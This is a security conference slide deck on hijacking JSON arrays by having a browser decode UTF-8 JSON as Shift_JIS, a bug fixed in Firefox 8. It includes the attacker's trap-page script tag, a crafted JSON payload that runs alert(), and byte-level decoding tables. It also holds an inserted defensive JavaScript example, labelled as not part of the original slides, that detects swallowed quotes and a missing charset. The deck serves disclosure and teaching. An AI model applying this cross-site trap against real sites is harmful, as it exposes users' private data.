JS Array Hijacking with MBCS encodings
Apr 4 2012, Yosuke HASEGAWA
JS Array Hijacking with MBCS
- A way to peek at JSON arrays
- An applied character-encoding technique
- Fixed in Mozilla Firefox 8 / MFSA 2011-47
Shibuya.XSS, NetAgent http://www.netagent.co.jp/
[Diagram: User and Web mail. The user's page calls XHR.send(…), the web mail returns JSON [ "a@example.com", "..." ], and the page calls JSON.parse(txt).]
[Diagram: Attacker, User and Web mail. The attacker sends mail with From: "...0x82". The attacker's HTML contains <script src="json">, and the user's browser loads the web mail's JSON [ "...0x82", "..." ] through that <script src="json">.]
Target JSON (UTF-8)
Content-Type: application/json
[ "あ", ", alert(/", "alice", "bob", "/.source)]//" ]
Trap page prepared by the attacker
<script src="http://example.jp/target.json" charset="shift_jis"></script>
Target JSON (UTF-8)
Content-Type: application/json
[ "あ", ", alert(/", "alice", "bob", "/.source)]//" ]
UTF-8:     22 → "   E3 81 82 → あ   22 → "   2C → ,   22 → "   61 6C 65 72 74 28 → alert(
Shift_JIS: 22 → "   E3 81 → 縺   82 22 → ?   2C → ,   22 → "   61 6C 65 72 74 28 → alert(
Result as read in Shift_JIS:
[ "縺<?>, ", alert(/", "alice", "bob", "/.source) ]//" ]
Target JSON (UTF-8)
Content-Type: application/json
[ "あ", ", alert(/", "alice", "bob", "/.source)]//" ]
UTF-8:     22 → "   E3 81 82 → あ   22 → "   2C → ,   22 → "   61 6C 65 72 74 28 → alert(
Shift_JIS: 22 → "   E3 81 → 縺   82 → ?   22 → "   2C → ,   22 → "   61 6C 65 72 74 28 → alert(
Result as read in Shift_JIS:
[ "縺<?>", ", alert(/", "alice", "bob", "/.source)]//" ]
Fixed behaviour (same as IE)
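The two decoding behaviours from the byte tables above, as an added example that is not part of the original slides: a simplified Shift_JIS byte walker (function names are hypothetical, sample strings are constructed) that reports which quote bytes of a UTF-8 JSON body are absorbed under the pre-fix handling, together with a check for the missing charset parameter named in the summary.

```javascript
// Added illustration; names are hypothetical and not taken from the slides.
// Shift_JIS byte classes: lead bytes open a two-byte character,
// trail bytes are the only values allowed to complete one.
const isLead = (b) => (b >= 0x81 && b <= 0x9f) || (b >= 0xe0 && b <= 0xfc);
const isTrail = (b) => (b >= 0x40 && b <= 0x7e) || (b >= 0x80 && b <= 0xfc);

// Walk the bytes the way a Shift_JIS decoder would and return the offsets
// of 0x22 bytes that still come out as '"'.
// legacy = true : a lead byte always consumes the next byte (pre-fix).
// legacy = false: an invalid trail byte stays in the stream (fixed).
function survivingQuotes(bytes, legacy) {
  const offsets = [];
  for (let i = 0; i < bytes.length; i++) {
    const b = bytes[i];
    if (isLead(b)) {
      const next = bytes[i + 1];
      if (next !== undefined && (legacy || isTrail(next))) i++;
      continue; // the lead byte itself never yields a quote
    }
    if (b === 0x22) offsets.push(i);
  }
  return offsets;
}

// Byte offsets of string delimiters in a UTF-8 JSON body that the fixed
// decoder keeps but the pre-fix decoder absorbs.
function swallowedQuotes(jsonText) {
  const bytes = new TextEncoder().encode(jsonText);
  const legacy = new Set(survivingQuotes(bytes, true));
  return survivingQuotes(bytes, false).filter((i) => !legacy.has(i));
}

// Server-side check for the root cause named in the summary slide:
// a JSON Content-Type header that carries no charset parameter.
function declaresCharset(contentType) {
  return /;\s*charset\s*=\s*"?[\w.:-]+"?/i.test(contentType);
}

// Constructed sample: the slide's JSON, re-typed without padding spaces.
const sample = '["あ",", alert(/","alice","bob","/.source)]//"]';
console.log(swallowedQuotes(sample));
console.log(declaresCharset("application/json"));
```
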
Summary
- Not putting a charset on the JSON response is the weak point to begin with.
- That said, RFC 4627 says: "JSON text SHALL be encoded in Unicode. The default encoding is UTF-8."
- The sites that can be attacked are limited.
- MFSA 2011-47: Potential XSS against sites using Shift-JIS http://www.mozilla.org/security/announce/2011/mfsa2011-47.html
- 690225 – Universal XSS likely with MultiByte charset (e.g. japanese sites) https://bugzilla.mozilla.org/show_bug.cgi?id=690225
Quite exaggerated! The original title was "JSON hijacking with MultiByte charset".
Questions
hasegawa@utf-8.jp hasegawa@netagent.co.jp @hasegawayosuke http://utf-8.jp/